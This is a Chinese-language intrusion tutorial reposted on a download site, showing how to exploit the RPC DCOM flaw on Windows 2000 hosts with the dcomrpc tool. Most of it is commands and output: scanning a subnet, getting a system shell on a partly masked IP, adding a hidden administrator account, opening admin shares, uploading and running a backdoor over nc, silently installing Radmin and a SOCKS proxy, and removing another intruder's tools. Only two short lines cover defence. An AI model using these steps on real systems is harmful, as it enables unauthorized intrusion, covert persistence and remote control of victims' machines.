需要的工具:
很好的:radmin.exe
扫描工具: retinarpcdcom.exe
溢出攻击工具:RpcDcom(通用溢出工具)
脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelnet.exe
代理:sksockserver.exe
后门程序:WinEggDropShellPro3thVersion
好了,该做的都做的差不多了。现在开始把~~
首先使用retinarpcdcom.exe扫描一个网段。查找有rpc漏洞的机子,这个漏洞需要135端口开放,(想必
随便扫一下就会发现有许多主机开放的135端口)。。。。。。
(人走运座着都能检到钱) 211.217.50.xx第一个主机就被扫出来又此漏洞。开始工作
看看211.217.50.xx有没有其他的漏洞或是若口令之类的.我们可以使用流光扫描一下, 好了..看样子没有
其他的缺陷,主机开了3389端口,我们可以上去看一下是xp版本还是win2k
哈哈,是win2k server版本
展开命令行:
[查看dcomrpc的用法用法 dcomrpc -d <host> [options] ]
F:\\hack>cd rpc\\dcomrpc
RPC DCOM Expl01t coded by .:[oc192.us]:. Security
Complied and Modified by Expl01t www.longker.com
Usage:
dcomrpc -d <host> [options]
Options:
-d:Hostname to attack [Required]
-t:Type [Default: 0]
-r:Return address [Default: Selected from target]
-p:Attack port [Default: 135]
-l:Bindshell port [Default: 666]
Types:
0 [0x0018759f]: [Win2k-Universal]
1 [0x0100139d]: [WinXP-Universal]
开始进行溢出:
F:\\hack>cd rpc\\dcomrpc -d211.217.50.xx 0
RPC DCOM remote expl01t – .:[oc192.us]:. Security
Complied and recorrected by Expl01t www.longker.com
[ ] Resolving host..
[ ] Done.
[ ] Expl01ting….Just wait……
等到出现,说明溢出成功
c:\\winnt\\system32>
接着我们建立用户
c:\\winnt\\system32>net user blueye$Content$nbsp;1111 /add
命令成功完成。
把用户添加成超级管理员
c:\\winnt\\system32>net localgroup administrators blueye$Content$nbsp;/add
命令成功完成。
看看共享开了没有,没有的话把共享开开
c:\\winnt\\system32>net share
清单是空的。
c:\\winnt\\system32>net share ipc$Content$nbsp;
命令成功完成。
c:\\winnt\\system32>net share admin$Content$nbsp;
命令成功完成。
到这里我们入侵告一段落
[ 建 立 IPC$Content$nbsp;连 接 ,也可以使用tftp上传 ,先和对方建立连接]
F:\\hack>net use \\\\211.217.50.xx\\ipc$Content$nbsp;"1111" /user:blueye$Content$nbsp;
[ 上 传 一 个 后 门 程 序 到 对 方 的 主 机 里]
F:\\hack>copy d:\\inject.exe \\\\211.217.50.xx\\admin$\\system32
F:\\hack>copy d:\\tback.dll \\\\211.217.50.xx\\admin$\\system32
然后运行后门程序,我们可以使用at命令。但是有的机器把at明令禁止了,建议直接开起telnet
使用opentelnet.exe 关闭开启的telnet使用resumetelnet \\\\ip user password
如果忘记开共享可以使用脚本开启telnet来开共享,用法:
cscript telnet.vbe ip user password null port (null是验证方式)
F:\\hack>opentenet \\\\211.217.50.xx blueye$Content$nbsp;1111 1 4567
F:\\hack>telnet 211.217.50.xx 4567
省略…
连接并运行后门程序,运行后门程序命令根目录:inject.exe -run
(后门使用方法和安装都在zip文件里面包含了)
后门端口123456
F:\\hack>nc 211.217.50.xx 123456
Welcome To WinEggDropShell Matrix Version
[Melody]#
下面安装radmin
配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章
radmin.reg
raddrv.dll
admdll.dll
r_server.exe
把这个4个文件copy c:\\winnt\\system32
在目录下面执行命令
c:\\winnt\\system32>r_server /s radmin.reg —–导入注册表
c:\\winnt\\system32>r_server /install /silence —–安装radmin.并且不显示托盘
c:\\winnt\\system32>net start r_server—– 启动服务
可以开启3389的话你自己看着办把,哈哈
安装sock代理
把sksockserver.exe copy c:\\winnt\\system32
c:\\winnt\\system32>sksockserver /install—–安装服务
c:\\winnt\\system32>sksockserver -config port 1234—-端口定在1234自己可以改
c:\\winnt\\system32>sksockserver -config starttype 2—-开机自动启动
c:\\winnt\\system32>net start skserver —-启动服务
最后删除共享
net share ipc$Content$nbsp;/del
net share admin$Content$nbsp;/del
在安装radmin的时候你发现有人已经安装了。。怎么办?走人?——–NO
看操作 (我输入的内容)
后门连接
F:\\hack>nc 211.217.50.xx 123456
Welcome To WinEggDropShell Matrix Version
[Melody]#(pslist)
[Melody]#(pskill r_server)
[Melody]#(shell)
c:\\winnt\\system32>(del r_server.exe)
c:\\winnt\\system32>(del admdll.dll)
c:\\winnt\\system32>(del raddrv.dll)
copy你自己的上去,然后安装
省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上面架上了密
码
等等。。。。为什么我输入导入注册表命令不管用呢?出现什么regedit不是可运行的程序之类的 。
完了,努力白费了。。。。。。。 —————————–NO
出现这样的情况最简单的解决办法telnet上去导入试试看,什么?不是把,有没有搞错阿。。。
呵呵,尽管放心,去试试看就知道;还可以先运行radmin 然后在radmin的dos下导入,也是可以的
嗬嗬,去试试看吧
防御办法:
安装rpc补丁
使用防火墙过滤135,445,139等端口
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » dcomrpc入侵
常见问题FAQ
- 免费下载或者VIP会员专享资源能否直接商用?
- 本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
- 织梦模板使用说明
- 你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html
